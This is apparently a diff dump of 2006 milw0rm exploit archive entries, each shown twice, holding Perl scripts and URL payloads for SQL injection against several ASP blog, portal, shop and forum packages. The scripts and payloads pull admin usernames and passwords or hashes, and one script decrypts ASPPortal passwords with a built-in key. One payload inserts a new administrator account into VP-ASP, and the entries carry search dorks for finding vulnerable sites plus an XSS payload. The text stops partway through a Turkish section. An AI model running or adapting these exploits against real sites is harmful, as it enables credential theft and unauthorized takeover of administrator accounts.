<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>
Save this code as .htm and then execute.
# nukedx.com [2006-03-07]
# milw0rm.com [2006-03-09]

View file

@ -1,67 +1,67 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=20
#Usage: beta.pl <host> <path>
#googledork: [ "Powered by bp blog" ] 9.710 pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to BetaParticle ex: /blog\r\n";
exit();
}
sub exploit () {
#Our variables...
$bpserver = $ARGV[0];
$bpserver =~ s/(http:\/\/)//eg;
$bphost = "http://".$bpserver;
$bpdir = $ARGV[1];
$bpport = "80";
$bptar = "template_gallery_detail.asp?fldGalleryID=";
$bpfinal = "main.asp";
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
#Sending data...
header();
print "- Trying to connect: $bpserver\r\n";
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
print $bp "GET $bpreq HTTP/1.1\n";
print $bp "Accept: */*\n";
print $bp "Referer: $bphost\n";
print $bp "Accept-Language: tr\n";
print $bp "User-Agent: NukeZilla 4.3\n";
print $bp "Cache-Control: no-cache\n";
print $bp "Host: $bpserver\n";
print $bp "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$bp>) {
if ($answer =~ /<h3>(.*?)<\/h3>/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- Username: $1\r\n";
}
if ($answer =~ /<p>(.*?)<\/p>/) {
print "- Password: $1\r\n";
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of BetaParticle is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-18]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=20
#Usage: beta.pl <host> <path>
#googledork: [ "Powered by bp blog" ] 9.710 pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to BetaParticle ex: /blog\r\n";
exit();
}
sub exploit () {
#Our variables...
$bpserver = $ARGV[0];
$bpserver =~ s/(http:\/\/)//eg;
$bphost = "http://".$bpserver;
$bpdir = $ARGV[1];
$bpport = "80";
$bptar = "template_gallery_detail.asp?fldGalleryID=";
$bpfinal = "main.asp";
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
#Sending data...
header();
print "- Trying to connect: $bpserver\r\n";
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
print $bp "GET $bpreq HTTP/1.1\n";
print $bp "Accept: */*\n";
print $bp "Referer: $bphost\n";
print $bp "Accept-Language: tr\n";
print $bp "User-Agent: NukeZilla 4.3\n";
print $bp "Cache-Control: no-cache\n";
print $bp "Host: $bpserver\n";
print $bp "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$bp>) {
if ($answer =~ /<h3>(.*?)<\/h3>/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- Username: $1\r\n";
}
if ($answer =~ /<p>(.*?)<\/p>/) {
print "- Password: $1\r\n";
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of BetaParticle is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-18]

View file

@ -1,87 +1,87 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=21
#Usage: aspp.pl <host> <path> <user>
use IO::Socket;
use Math::BigInt;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-21\r\n";
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
print "- <user> -> Username that you want password. ex: admin\r\n";
exit();
}
sub decrypt ()
{
$lp = length($appass);
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
if ($lp == 0) { die("- An error occurued\r\n"); }
for ($i = 0; $i < $lp ; $i++) {
$f = $lp - $i - 1; # Formula for getting character via substr...
$n = substr($apkey,$f,1);
$l = substr($appass,$f,1);
$appwd = chr(ord($n)^ord($l)).$appwd;
}
print "- Password decrypted as: $appwd\r\n";
print "- Lets go $aphost$apdir$apfinal for login\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$apserver = $ARGV[0];
$apserver =~ s/(http:\/\/)//eg;
$aphost = "http://".$apserver;
$apdir = $ARGV[1];
$apport = "80";
$aptar = "content/downloads/download_click.asp?downloadid=";
$apfinal = "content/users/login.asp";
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
$apreq = $aphost.$apdir.$aptar.$apxp;
#Sending data...
header();
print "- Trying to connect: $apserver\r\n";
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
print $ap "GET $apreq HTTP/1.1\n";
print $ap "Accept: */*\n";
print $ap "Referer: $aphost\n";
print $ap "Accept-Language: tr\n";
print $ap "User-Agent: NukeZilla\n";
print $ap "Cache-Control: no-cache\n";
print $ap "Host: $apserver\n";
print $ap "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$ap>) {
if ($answer =~ /string: &quot;(.*?)&quot;]'/) {
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
print "- Username: $ARGV[2]\r\n";
print "- Decrypting password....\r\n";
$appass = $1;
$appass =~ s/(&quot;)/chr(34)/eg;
$appass =~ s/(&lt;)/chr(60)/eg;
$appass =~ s/(&gt;)/chr(62)/eg;
$appass =~ s/(&nbsp;)/chr(32)/eg;
decrypt();
}
if ($answer =~ /number of columns/) {
print "- This version of ASPPortal is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-20]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=21
#Usage: aspp.pl <host> <path> <user>
use IO::Socket;
use Math::BigInt;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-21\r\n";
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
print "- <user> -> Username that you want password. ex: admin\r\n";
exit();
}
sub decrypt ()
{
$lp = length($appass);
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
if ($lp == 0) { die("- An error occurued\r\n"); }
for ($i = 0; $i < $lp ; $i++) {
$f = $lp - $i - 1; # Formula for getting character via substr...
$n = substr($apkey,$f,1);
$l = substr($appass,$f,1);
$appwd = chr(ord($n)^ord($l)).$appwd;
}
print "- Password decrypted as: $appwd\r\n";
print "- Lets go $aphost$apdir$apfinal for login\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$apserver = $ARGV[0];
$apserver =~ s/(http:\/\/)//eg;
$aphost = "http://".$apserver;
$apdir = $ARGV[1];
$apport = "80";
$aptar = "content/downloads/download_click.asp?downloadid=";
$apfinal = "content/users/login.asp";
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
$apreq = $aphost.$apdir.$aptar.$apxp;
#Sending data...
header();
print "- Trying to connect: $apserver\r\n";
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
print $ap "GET $apreq HTTP/1.1\n";
print $ap "Accept: */*\n";
print $ap "Referer: $aphost\n";
print $ap "Accept-Language: tr\n";
print $ap "User-Agent: NukeZilla\n";
print $ap "Cache-Control: no-cache\n";
print $ap "Host: $apserver\n";
print $ap "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$ap>) {
if ($answer =~ /string: &quot;(.*?)&quot;]'/) {
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
print "- Username: $ARGV[2]\r\n";
print "- Decrypting password....\r\n";
$appass = $1;
$appass =~ s/(&quot;)/chr(34)/eg;
$appass =~ s/(&lt;)/chr(60)/eg;
$appass =~ s/(&gt;)/chr(62)/eg;
$appass =~ s/(&nbsp;)/chr(32)/eg;
decrypt();
}
if ($answer =~ /number of columns/) {
print "- This version of ASPPortal is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
# milw0rm.com [2006-03-20]

View file

@ -1,69 +1,69 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=22
#Usage: ezasp.pl <host> <path>
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-22\r\n";
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$ezserver = $ARGV[0];
$ezserver =~ s/(http:\/\/)//eg;
$ezhost = "http://".$ezserver;
$ezdir = $ARGV[1];
$ezport = "80";
$eztar = "Default.asp?Scheme=";
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
$ezreq = $ezhost.$ezdir.$eztar.$ezxp;
#Sending data...
header();
print "- Trying to connect: $ezserver\r\n";
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
print $ez "GET $ezreq HTTP/1.1\n";
print $ez "Accept: */*\n";
print $ez "Referer: $ezhost\n";
print $ez "Accept-Language: tr\n";
print $ez "User-Agent: NukeZilla\n";
print $ez "Cache-Control: no-cache\n";
print $ez "Host: $ezserver\n";
print $ez "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$ez>) {
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- USERNAME: $1\r\n";
}
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
print "- SHA1 HASH of PASSWORD: $1\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of EzASPSite is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
# nukedx.com [2006-03-29]
# milw0rm.com [2006-03-29]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=22
#Usage: ezasp.pl <host> <path>
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-22\r\n";
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$ezserver = $ARGV[0];
$ezserver =~ s/(http:\/\/)//eg;
$ezhost = "http://".$ezserver;
$ezdir = $ARGV[1];
$ezport = "80";
$eztar = "Default.asp?Scheme=";
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
$ezreq = $ezhost.$ezdir.$eztar.$ezxp;
#Sending data...
header();
print "- Trying to connect: $ezserver\r\n";
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
print $ez "GET $ezreq HTTP/1.1\n";
print $ez "Accept: */*\n";
print $ez "Referer: $ezhost\n";
print $ez "Accept-Language: tr\n";
print $ez "User-Agent: NukeZilla\n";
print $ez "Cache-Control: no-cache\n";
print $ez "Host: $ezserver\n";
print $ez "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$ez>) {
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
print "- Exploit succeed! Getting admin's information\r\n";
print "- USERNAME: $1\r\n";
}
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
print "- SHA1 HASH of PASSWORD: $1\r\n";
exit();
}
if ($answer =~ /number of columns/) {
print "- This version of EzASPSite is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
# nukedx.com [2006-03-29]
# milw0rm.com [2006-03-29]

View file

@ -1,77 +1,77 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=23
#Usage: aspsi.pl <host> <path> <userid>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-23\r\n";
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
print "- <userid> -> ID of user that you want info ex: 1\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$asserver = $ARGV[0];
$asserver =~ s/(http:\/\/)//eg;
$ashost = "http://".$asserver;
$asdir = $ARGV[1];
$asport = "80";
$astar = "Haberler.asp?haber=devam&id=";
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
$asreq = $ashost.$asdir.$astar.$asxp;
#Sending data...
header();
print "- Trying to connect: $asserver\r\n";
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
print $as "GET $asreq HTTP/1.1\n";
print $as "Accept: */*\n";
print $as "Referer: $ashost\n";
print $as "Accept-Language: tr\n";
print $as "User-Agent: NukeZilla\n";
print $as "Cache-Control: no-cache\n";
print $as "Host: $asserver\n";
print $as "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$as>) {
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
if ($1 == $ARGV[2]) {
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
}
else { die "- Exploit failed\n"; }
}
if ($answer =~ /\" align=\"left\">(.*?)</) {
print "- Username: $1\r\n";
}
if ($answer =~ /Ekleyen&nbsp;&nbsp;\(<b>(.*?)<\/b>\)/) {
print "- MD5 HASH of PASSWORD: $1\r\n";
}
if ($answer =~ /\| (.*?) ]<br>/) {
print "- Regdate: $1\r\n";
}
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
print "- Email: $1\r\n";
}
if ($answer =~ / Okunma : (.*?) /) {
print "- MD5 hash of answer: $1\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
#nukedx.com [2006-04-19]
# milw0rm.com [2006-04-19]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=23
#Usage: aspsi.pl <host> <path> <userid>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-23\r\n";
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
print "- <userid> -> ID of user that you want info ex: 1\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$asserver = $ARGV[0];
$asserver =~ s/(http:\/\/)//eg;
$ashost = "http://".$asserver;
$asdir = $ARGV[1];
$asport = "80";
$astar = "Haberler.asp?haber=devam&id=";
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
$asreq = $ashost.$asdir.$astar.$asxp;
#Sending data...
header();
print "- Trying to connect: $asserver\r\n";
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
print $as "GET $asreq HTTP/1.1\n";
print $as "Accept: */*\n";
print $as "Referer: $ashost\n";
print $as "Accept-Language: tr\n";
print $as "User-Agent: NukeZilla\n";
print $as "Cache-Control: no-cache\n";
print $as "Host: $asserver\n";
print $as "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$as>) {
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
if ($1 == $ARGV[2]) {
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
}
else { die "- Exploit failed\n"; }
}
if ($answer =~ /\" align=\"left\">(.*?)</) {
print "- Username: $1\r\n";
}
if ($answer =~ /Ekleyen&nbsp;&nbsp;\(<b>(.*?)<\/b>\)/) {
print "- MD5 HASH of PASSWORD: $1\r\n";
}
if ($answer =~ /\| (.*?) ]<br>/) {
print "- Regdate: $1\r\n";
}
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
print "- Email: $1\r\n";
}
if ($answer =~ / Okunma : (.*?) /) {
print "- MD5 hash of answer: $1\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
#nukedx.com [2006-04-19]
# milw0rm.com [2006-04-19]

View file

@ -1,18 +1,18 @@
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:
First you must be logged in
Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password
# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun!
# milw0rm.com [2006-04-24]
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:
First you must be logged in
Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password
# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun!
# milw0rm.com [2006-04-24]

View file

@ -1,30 +1,30 @@
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp.
* the vendor was already notified.
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.
* this information is for educational purposes only!
----
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
quick hack to add user a/a:
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
and for those of you that don't know sql at all
this is how you remove the user 'a':
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
-tracewar
# milw0rm.com [2006-05-06]
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp.
* the vendor was already notified.
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.
* this information is for educational purposes only!
----
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
quick hack to add user a/a:
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
and for those of you that don't know sql at all
this is how you remove the user 'a':
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
-tracewar
# milw0rm.com [2006-05-06]

View file

@ -1,21 +1,21 @@
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .
Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
-------
By FarhadKey On 19 May 2006
# milw0rm.com [2006-05-19]
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .
Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
-------
By FarhadKey On 19 May 2006
# milw0rm.com [2006-05-19]

View file

@ -1,11 +1,11 @@
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# greetz : Nukedx,TheHacker
# Dork : "qjForum"
# Exploit:
# Login before injection.
### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
# milw0rm.com [2006-05-26]
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# greetz : Nukedx,TheHacker
# Dork : "qjForum"
# Exploit:
# Login before injection.
### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
# milw0rm.com [2006-05-26]

View file

@ -1,49 +1,49 @@
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
TURKISH
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Aç... Bulan : ajann
# Aç.k bulunan dosyalar;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
Örnek:
